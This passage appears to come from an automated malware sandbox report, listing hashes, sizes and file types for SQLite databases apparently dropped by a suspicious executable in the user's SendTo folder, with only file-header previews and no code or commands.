                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
